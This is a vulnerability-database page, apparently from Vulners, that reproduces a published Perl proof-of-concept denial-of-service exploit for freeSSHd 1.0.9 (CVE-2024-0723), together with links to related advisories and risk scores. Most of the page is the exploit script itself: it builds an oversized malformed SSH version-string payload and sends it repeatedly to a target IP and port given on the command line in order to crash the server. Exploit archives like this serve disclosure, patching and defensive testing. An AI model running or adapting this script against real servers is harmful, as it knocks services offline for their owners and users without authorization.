Vulners
Lucene search
๐ freeSSHd 1.0.9 Denial of Service
๐๏ธย 26 Jun 2025ย 00:00:00Reported byย Fernando MengaliTypeย 
ย packetstorm๐ย packetstorm.news๐ย 86ย Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2024-0723 | 19 Jan 202418:22 | โ | circl |
 | freeSSHd Security Vulnerability | 19 Jan 202400:00 | โ | cnnvd |
 | CVE-2024-0723 | 19 Jan 202416:31 | โ | cve |
 | CVE-2024-0723 freeSSHd denial of service | 19 Jan 202416:31 | โ | cvelist |
 | freeSSHd 1.0.9 - Denial of Service (DoS) | 26 Jun 202500:00 | โ | exploitdb |
 | EUVD-2024-16513 | 3 Oct 202520:07 | โ | euvd |
 | CVE-2024-0723 | 19 Jan 202417:15 | โ | nvd |
 | Design/Logic Flaw | 19 Jan 202417:15 | โ | prion |
 | PT-2024-15782 ยท Freesshd ยท Freesshd | 19 Jan 202400:00 | โ | ptsecurity |
 | CVE-2024-0723 | 23 May 202507:24 | โ | redhatcve |
10
# Exploit Title: freeSSHd 1.0.9 - Denial of Service (DoS)
# Date: 2024-01-13
# Discovery by: Fernando Mengali
# Linkedin: https://www.linkedin.com/in/fernando-mengali/
# Software Link: https://www.exploit-db.com/apps/be82447d556d60db55053d658b4822a8-freeSSHd.exe
# Version: 1.0.9
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Tested on: Windows XP - SP3 - English
# CVE: CVE-2024-0723
use IO::Socket;
#2. Proof of Concept - PoC
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
print "[+] Exploiting... \n";
my $bufff =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"x18;
my $payload =
"\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" .
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".("A" x 1067);
$payload .= $payload;
$payload .= "C" x 19021 . "\r\n";
my $i=0;
while ($i<=18) {
my $sock = IO::Socket::INET->new(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp'
) or die "Cannot connect!\n";
if (<$sock> eq '') {
print "[+] Done - Exploited success!!!!!\n\n";
exit;
}
$sock->send($payload) or die "Exploited successuful!!!";
$i++;
}
sub intro {
print q {
_/|
// o\
|| ._)
//__\
)___(
[+] freeSSHd 1.0.9 - Denial of Service (DoS)
[*] Coded by Fernando Mengali
[@] e-mail: [email protected]
}
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2025 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 3.15.3 - 7.5
CVSS 25
CVSS 35.3
EPSS0.01278
SSVC